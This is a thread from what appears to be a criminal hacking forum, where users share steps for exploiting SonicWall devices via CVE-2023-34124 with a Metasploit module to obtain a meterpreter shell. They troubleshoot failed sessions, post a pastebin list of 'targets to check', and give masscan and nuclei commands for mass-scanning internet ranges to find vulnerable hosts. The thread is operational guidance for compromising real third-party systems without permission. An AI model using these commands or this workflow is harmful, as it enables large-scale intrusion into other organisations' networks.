• XSS.stack #1 – первый литературный журнал от юзеров форума

Remote Sonicwall RCE CVE-2023-34124

0x00x0

HDD-drive
Забанен
Регистрация
25.04.2022
Сообщения
48
Реакции
57
Гарант сделки
2
Депозит
0.009 Ł и др.
Пожалуйста, обратите внимание, что пользователь заблокирован
C-подобный:
    Start msfconsole
    Do use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124
    Set the appropriate TARGET, RHOST, LHOST, and possibly FETCH_SRVHOST (for Windows)
    Do run
    You should get meterpreter

github.com/rapid7/metasploit-framework/pull/18302
 
[*] Attempting to execute the shell injection payload
[+] Payload sent!
[*] Exploit completed, but no session was created.

does anybody know the reason for this?
Reason 1: Mismatch of payload and exploit architecture
Reason 2: Mismatch in LHOST / SRVHOST

Reason 3: You are behind NAT

Reason 4: Restrictive firewall policy

Reason 5: Killed by Antivirus / EDR

Reason 6: Exploit is unreliable

Reason 7: Target is patched


I found this tutorial who explain how to fix it

By the way metasploit is a skid tool, it's better to create you're own exploit with you're own features.


https://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/

I Hope this helped you have a nice day
 
Reason 1: Mismatch of payload and exploit architecture
Reason 2: Mismatch in LHOST / SRVHOST

Reason 3: You are behind NAT

Reason 4: Restrictive firewall policy

Reason 5: Killed by Antivirus / EDR

Reason 6: Exploit is unreliable

Reason 7: Target is patched


I found this tutorial who explain how to fix it

By the way metasploit is a skid tool, it's better to create you're own exploit with you're own features.


https://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/

I Hope this helped you have a nice day
thank you so much
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Some targets to check: https://pastebin.com/3LMygR4J
I'm also getting
Код:
[*] Exploit completed, but no session was created,
though.
 
Reason 1: Mismatch of payload and exploit architecture
Reason 2: Mismatch in LHOST / SRVHOST

Reason 3: You are behind NAT

Reason 4: Restrictive firewall policy

Reason 5: Killed by Antivirus / EDR

Reason 6: Exploit is unreliable

Reason 7: Target is patched


I found this tutorial who explain how to fix it

By the way metasploit is a skid tool, it's better to create you're own exploit with you're own features.


https://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/

I Hope this helped you have a nice day
incase if you have used this exploit
may i ask what payload you are using?
 
incase if you have used this exploit
may i ask what payload you are using?
Nop i don't use this exploit, but really if you have some skill in exploit dev make you're own, i'm too busy right now to make one for this exploit.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
it didn't give you any session at all too?
Yes, but I've noticed this problem quite a lot when using metasploit modules, so I guess would be better to test the exploit locally to see where it fails & rewrite it from the metasploits one.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
maybe the target is badly configured, ive gotten 2 linux and they work amazing
That's what happens when you use translate. What he means is the exploit works on Linux machines, while doesn't work on Windows.
 
Последнее редактирование:
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p8080,8443,4443,4433,80,443,10443,4444,9443 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt

awk '{ print $4 ":" $3 }' results.txt > final_results.txt

nuclei -l final_results.txt -t nuclei-templates/http/cves/2023/CVE-2023-34124.yaml -o vulns.txt
Mistake*

Код:
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p8080,8443,4443,4433,80,443,10443,4444,9443 --open-only --excludefile block.txt --output-format list --output-file results.txt
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх